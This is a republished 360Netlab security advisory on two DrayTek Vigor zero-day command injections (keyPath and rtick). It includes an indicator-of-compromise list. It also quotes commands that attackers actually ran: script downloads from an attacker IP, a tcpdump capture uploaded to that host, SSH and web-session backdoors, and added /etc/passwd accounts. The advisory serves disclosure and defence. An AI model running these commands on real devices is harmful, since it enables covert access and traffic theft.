Two zero days are Targeting DrayTek Broadband CPE Devices

栏目: IT技术 · 发布时间: 4年前

内容简介:From December 4, 2019, 360Netlab Threat Detection System has observed two different attack groups using two 0-day vulnerabilities of DrayTek[On December 25, 2020, due to the highly malicious nature of the attack, we disclosed on Twitter[On February 10, 202

Background

From December 4, 2019, 360Netlab Threat Detection System has observed two different attack groups using two 0-day vulnerabilities of DrayTek[ 1] Vigor enterprise routers and switch devices to conduct a series of attacks, including eavesdropping on device’s network traffic, running SSH services on high ports, creating system backdoor accounts, and even creating a specific Malicious Web Session backdoor.

On December 25, 2020, due to the highly malicious nature of the attack, we disclosed on Twitter[ 2] [ 3] the ongoing 0-day attack IoC without mentioning the vendor name or product lines. We also provided more details to some national CERTs.

On February 10, 2020, the manufacturer DrayTek issued a security bulletin[ 4] , which fixed the vulnerability and released the latest firmware program 1.5.1. (here we actually have an easter egg we might talk about later)

Vulnerability analysis

With the help of 360 Firmware Total system [ 5] , we are able to perform vulnerability research . The two 0-day vulnerability command injection points are keyPath and rtick , located in the /www/cgi-bin/mainfunction.cgi , and the corresponding Web Server program is /usr/sbin/lighttpd .

keyPath command injection vulnerability analysis

Vulnerability type: unauthorized remote command execution vulnerability

Vulnerability details: Two account password transmission methods are supported by the DrayTek devices, plain text and RSA encrypted transmission.

For RSA encrypted transmission, the interaction logic is:

  1. The web front end uses the RSA public key to encrypt the username and password, and uses a keyPath field to specify the file suffix of the RSA private key to initiate a login request;
  2. When the formLogin() function in the /www/cgi-bin/mainfunction.cgi detects that the keyPath field is not empty, the decryption starts;
  3. formLogin() uses the keypath as input to craft the following path /tmp/rsa/private_key_<keyPath> as the RSA private key;
  4. formLogin() performs Base64 decode on the username and password fields, writes them to the /tmp/rsa/binary_loginfile , and executes the following command to decrypt the username and password
    openssl rsautl -inkey '/tmp/rsa/private_key_<keyPath>' -decrypt -in /tmp/rsa/binary_login
  5. Finally, the formLogin() function takes the decrypted user name and password to continue the verification.

The issue here is that keyPath does not have very strong input control, which makes unauthorized remote command execution possible.

Bug fix: In version 1.5.1, keypath sets the field length a limit of 30, and the content must be hexadecimal characters.

Two zero days are Targeting DrayTek Broadband CPE Devices

rtick command injection vulnerability analysis

Vulnerability Type: unauthorized remote command execution vulnerability

Vulnerability details: When /www/cgi-bin/mainfunction.cgi needs to access verification code, it calls the function formCaptcha() , the function does not check the incoming timestamp from rtick, and calls /usr/sbin/captcha directly to generate <rtick>.gif the CAPTCHA image, which makes command injection possible.

Bug fix: In version 1.5.1, the vendor limits the rtick field to use only [0-9].

Two zero days are Targeting DrayTek Broadband CPE Devices

Analysis of wild 0-day attacks

Attack Group A

  1. Attacker A uses the keyPath command injection vulnerability to download and execute the http://103.82.143.51:58172/vig/tcpst1 script, and then further downloads and executes the following script.
http://103.82.143.51:58172/vi1
http://103.82.143.51:58172/vig/mailsend.sh1
  1. The script /etc/mailsend.sh is used to eavesdrop on all network interfaces on the DrayTek Vigor network device to listen on the ports 21, 25, 143, and 110. The tcpdump command /usr/sbin/tcpdump -i any -n -nn port 21 or port 25 or port 143 or port 110 -s 65535 -w /data/firewall.pcap & runs in the background, and a crontab is in place to upload the captured packets to https://103.82.143.51:58443/uploLSkciajUS.php every Monday, Wednesday, Friday at 0:00.

Attack group B

  1. Attacker B uses the rtick command injection vulnerability to create 2 sets of Web Session backdoors that never expires in the file /var/session.json
json -f /var/session.json set 7:CBZD1SOMBUHVAF34TPDGURT9RTMLRUDK username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json
json -f /var/session.json set 7:R8GFPS6E705MEXZWVQ0IB1SM7JTRVE57 username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json
  1. Attacker B further creates SSH backdoors on TCP / 22335 and TCP / 32459;
/usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 22335 | iptables -I PPTP_CTRL 1 -p tcp --dport 22335 -j ACCEPT
/usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 32459 | iptables -I PPTP_CTRL 1 -p tcp --dport 32459 -j ACCEPT
  1. A system backdoor account wuwuhanhan:caonimuqin is added as well.
sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$3u34GCgO$9Pklx3.3OVwbIBja/CzZN/:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;
sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$sbIljOP5$vacGOLqYAXcw3LWek9aJQ.:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;

Web Session backdoor

When we study the 0-day PoC, we noticed that when the session parameter updatetime is set to 0, DrayTek Vigor network device never logs out unless the device is rebooted.

(aka Auto-Logout: Disable)

Two zero days are Targeting DrayTek Broadband CPE Devices

Timeline

2019/12/04 We discovered ongoing attacks using the DrayTek Vigor 0-day keyPath vulnerability
2019/12/08 We reached out to a channel to report the vulnerability (but only later on found it did not work out)
2019/12/25 We disclosed on twitter the IoC and provided more details to some national CERTs.
2020/01/28 We discovered ongoing attacks using the DrayTek Vigor 0-day rtick vulnerability
2020/02/01 MITRE published the CVE-2020-8515
2020/02/10 DrayTek released a security bulletin and the latest firmware fix.

Affected firmware list

Vigor2960           <  v1.5.1
Vigor300B           <  v1.5.1
Vigor3900           <  v1.5.1
VigorSwitch20P2121  <= v2.3.2
VigorSwitch20G1280  <= v2.3.2
VigorSwitch20P1280  <= v2.3.2
VigorSwitch20G2280  <= v2.3.2
VigorSwitch20P2280  <= v2.3.2

Suggestions

We recommend that DrayTek Vigor users check and update their firmwares in a timely manner, and check whether there is a tcpdump process, SSH backdoor account, Web Session backdoor, etc on their systems.

We recommend the following IoCs to be monitored and blocked on the networks where it is applicable.

Contact us

Readers are always welcomed to reach us on twitter , or email to netlab at 360 dot cn.

IoC list

MD5

7c42b66ef314c466c1e3ff6b35f134a4
01946d5587c2774418b5a6c181199099
d556aa48fa77040a03ab120b4157c007

URL

http://103.82.143.51:58172/vig/tcpst1
http://103.82.143.51:58172/vi1
http://103.82.143.51:58172/vig/mailsend.sh1
https://103.82.143.51:58443/LSOCAISJDANSB.php
https://103.82.143.51:58443/uploLSkciajUS.php

Scanner IP

103.82.143.51       	Korea                   ASN136209           	Korea Fast Networks 
178.151.198.73      	Ukraine             	ASN13188            	Content Delivery Network Ltd

以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Java语言程序设计

Java语言程序设计

(美) Y. Daniel Liang / 李娜 / 机械工业出版社 / 2011-6 / 75.00元

本书是Java语言的经典教材,多年来畅销不衰。本书全面整合了Java 6的特性,采用“基础优先,问题驱动”的教学方式,循序渐进地介绍了程序设计基础、解决问题的方法、面向对象程序设计、图形用户界面设计、异常处理、I/O和递归等内容。此外,本书还全面且深入地覆盖了一些高级主题,包括算法和数据结构、多线程、网络、国际化、高级GUI等内容。 本书中文版由《Java语言程序设计:基础篇》和《Java语......一起来看看 《Java语言程序设计》 这本书的介绍吧!

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

URL 编码/解码
URL 编码/解码

URL 编码/解码

MD5 加密
MD5 加密

MD5 加密工具